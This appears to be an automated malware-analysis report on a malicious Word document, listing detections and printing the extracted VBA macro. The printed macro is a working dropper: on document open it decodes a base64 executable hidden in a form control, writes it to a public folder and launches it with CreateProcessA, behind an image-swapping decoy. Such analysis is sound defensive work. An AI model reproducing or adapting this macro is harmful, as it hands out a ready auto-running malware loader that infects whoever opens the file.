MALICIOUS
310
Risk Score
Heuristics 10
-
ClamAV: Ole2.Macro.Agent-9858864-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded PE decoded from VBA/UserForm payload string critical OLE_VBA_EMBEDDED_PE_DROPPERThe VBA macro carries a Windows executable encoded as a base64 or hex string — split across macro string literals, or stored in a UserForm control's text (e.g. TextBox1.Text) — and rebuilds it at run time, typically writing it to %ProgramData%/%TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set xmlObj = CreateObject("MSXML2.DOMDocument.6.0") -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes foundDisassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x41 bytesDisassembly hidden — these bytes score as data, not coherent x86 code (3/8 branch targets land on an instruction boundary (38% coherence)).
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5815 bytes |
SHA-256: 8f927deadde23cbbed0efc452afd9e0e28aff84df1ada8b081539f981ca48624 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function CreateProcessA Lib "kernel32" ( _
ByVal lpApplicationName As String, _
ByVal lpCommandLine As String, _
ByVal lpProcessAttributes As LongPtr, _
ByVal lpThreadAttributes As LongPtr, _
ByVal bInheritHandles As Long, _
ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As LongPtr, _
ByVal lpCurrentDirectory As String, _
lpStartupInfo As Any, _
lpProcessInformation As Any) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
ByVal hObject As LongPtr) As Long
Private Type STARTUPINFO
cb As Long
lpReserved As LongPtr
lpDesktop As LongPtr
lpTitle As LongPtr
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As LongPtr
hStdInput As LongPtr
hStdOutput As LongPtr
hStdError As LongPtr
End Type
Private Type PROCESS_INFORMATION
hProcess As LongPtr
hThread As LongPtr
dwProcessId As Long
dwThreadId As Long
End Type
Function Base64Decode(ByVal base64String As String) As Byte()
Dim xmlObj As Object
Dim nodeObj As Object
Set xmlObj = CreateObject("MSXML2.DOMDocument.6.0")
Set nodeObj = xmlObj.createElement("b64")
nodeObj.DataType = "bin.base64"
nodeObj.Text = base64String
Base64Decode = nodeObj.nodeTypedValue
End Function
Sub Run_e(ByVal exePath As String)
On Error GoTo ErrorHandler
Dim si As STARTUPINFO
Dim pi As PROCESS_INFORMATION
Dim ret As Long
si.cb = LenB(si)
ret = CreateProcessA(exePath, vbNullString, 0, 0, 0, 0, 0, vbNullString, si, pi)
If ret <> 0 Then
CloseHandle pi.hProcess
CloseHandle pi.hThread
Else
MsgBox "Failed to start process: " & Err.Description
End If
Exit Sub
ErrorHandler:
MsgBox "Error in Run_e: " & Err.Description
End Sub
Sub SmartToggle()
On Error GoTo ErrorHandler
Dim doc As Document
Set doc = ActiveDocument
Dim img1 As Shape, img2 As Shape
Set img1 = doc.Shapes("FullImage1")
Set img2 = doc.Shapes("FullImage2")
If img1.AlternativeText = "Front" Then
img1.WrapFormat.Type = wdWrapBehind
img2.WrapFormat.Type = wdWrapFront
img2.ZOrder msoBringToFront
img1.AlternativeText = "Back"
img2.AlternativeText = "Front"
Else
img2.WrapFormat.Type = wdWrapBehind
img1.WrapFormat.Type = wdWrapFront
img1.ZOrder msoBringToFront
img1.AlternativeText = "Front"
img2.AlternativeText = "Back"
End If
Exit Sub
ErrorHandler:
MsgBox "Error: " & Err.Description
End Sub
Private Sub Document_Open()
On Error GoTo ErrorHandler
SmartToggle
Dim pathh As String
Dim appBytes() As Byte
Dim fileNum As Integer
pathh = "C:\Users\Public\ui.txt"
appBytes = Base64Decode(UserForm1.bodf90.Text)
fileNum = FreeFile
Open pathh For Binary Access Write As #fileNum
Put #fileNum, 1, appBytes
Close #fileNum
Run_e pathh
Exit Sub
ErrorHandler:
MsgBox "Error in Document_Open: " & Err.Description
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{919618CB-62F5-4C41-BE37-81DFF65F57CA}{1FFE6BE1-856B-429D-980A-A968B67887C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub bodf90_Change()
End Sub
Attribute VB_Name = "Module1"
Sub CreateFullPageImages_NoFade()
On Error GoTo ErrorHandler
Dim doc As Document
Set doc = ActiveDocument
' Delete existing shapes
Do While doc.Shapes.Count > 0
doc.Shapes(1).Delete
Loop
' Page dimensions
Dim pageWidth As Single, pageHeight As Single
pageWidth = doc.PageSetup.pageWidth
pageHeight = doc.PageSetup.pageHeight
' Margin offsets
Dim leftMargin As Single, topMargin As Single
leftMargin = doc.PageSetup.leftMargin
topMargin = doc.PageSetup.topMargin
' Add first image
Dim img1 As Shape
Set img1 = doc.Shapes.AddPicture( _
FileName:="C:\Users\jojo\Desktop\im\Image1.jpg", _
LinkToFile:=False, _
SaveWithDocument:=True, _
Left:=-leftMargin, _
Top:=-topMargin, _
Width:=pageWidth, _
Height:=pageHeight)
img1.LockAspectRatio = msoFalse
img1.WrapFormat.Type = wdWrapBehind
img1.Name = "FullImage1"
img1.AlternativeText = "Back"
' Add second image
Dim img2 As Shape
Set img2 = doc.Shapes.AddPicture( _
FileName:="C:\Users\jojo\Desktop\im\Image2.jpg", _
LinkToFile:=False, _
SaveWithDocument:=True, _
Left:=-leftMargin, _
Top:=-topMargin, _
Width:=pageWidth, _
Height:=pageHeight)
img2.LockAspectRatio = msoFalse
img2.WrapFormat.Type = wdWrapFront
img2.Name = "FullImage2"
img2.AlternativeText = "Front"
img2.ZOrder msoBringToFront
MsgBox "Images created and initialized!"
Exit Sub
ErrorHandler:
MsgBox "Error: " & Err.Description
End Sub
|
|||
vba_embedded_payload.bin |
vba-embedded-pe | decoded from a hex/base64 payload string in a VBA UserForm control or macro literal | 804352 bytes |
SHA-256: 69c0c0d0cdfcebb698d952751f28f914a67f67a5e1bd81b4a1a4529ee7b78cbe |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 shell/COM execution token(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.